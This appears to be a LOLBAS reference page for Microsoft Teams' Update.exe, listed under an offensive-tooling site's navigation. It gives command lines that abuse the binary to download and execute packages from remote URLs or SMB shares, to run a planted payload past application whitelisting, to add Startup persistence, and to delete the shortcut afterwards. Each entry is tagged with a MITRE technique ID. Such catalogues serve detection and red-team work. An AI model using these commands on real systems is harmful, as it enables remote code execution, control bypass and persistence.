🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Update.exe

Update.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

AWL Bypass

Download and execute binary

Update.exe --update={REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User

Download and execute binary

Update.exe --update={PATH_SMB:folder}

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. — MITRE: T1218 — Privileges: User

Download and execute binary

Update.exe --updateRollback={REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User

Application Whitelisting Bypass

Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. — MITRE: T1218 — Privileges: User

Download and execute binary

Update.exe --updateRollback={PATH_SMB:folder}

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. — MITRE: T1218 — Privileges: User

Download

Download binary

Update.exe --download {REMOTEURL}

The above binary will go to url and look for RELEASES file and download the nuget package. — MITRE: T1218 — Privileges: User

Execute

Download and execute binary

Update.exe --update={REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User

Download and execute binary

Update.exe --update={PATH_SMB:folder}

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. — MITRE: T1218 — Privileges: User

Download and execute binary

Update.exe --updateRollback={REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User

Download and execute binary

Update.exe --updateRollback={PATH_SMB:folder}

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. — MITRE: T1218 — Privileges: User

Execute binary

Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. — MITRE: T1218 — Privileges: User

Execute binary

Update.exe --createShortcut={PATH:.exe} -l=Startup

Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. — MITRE: T1547 — Privileges: User

Execute binary

Update.exe --removeShortcut={PATH:.exe}-l=Startup

Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. — MITRE: T1070 — Privileges: User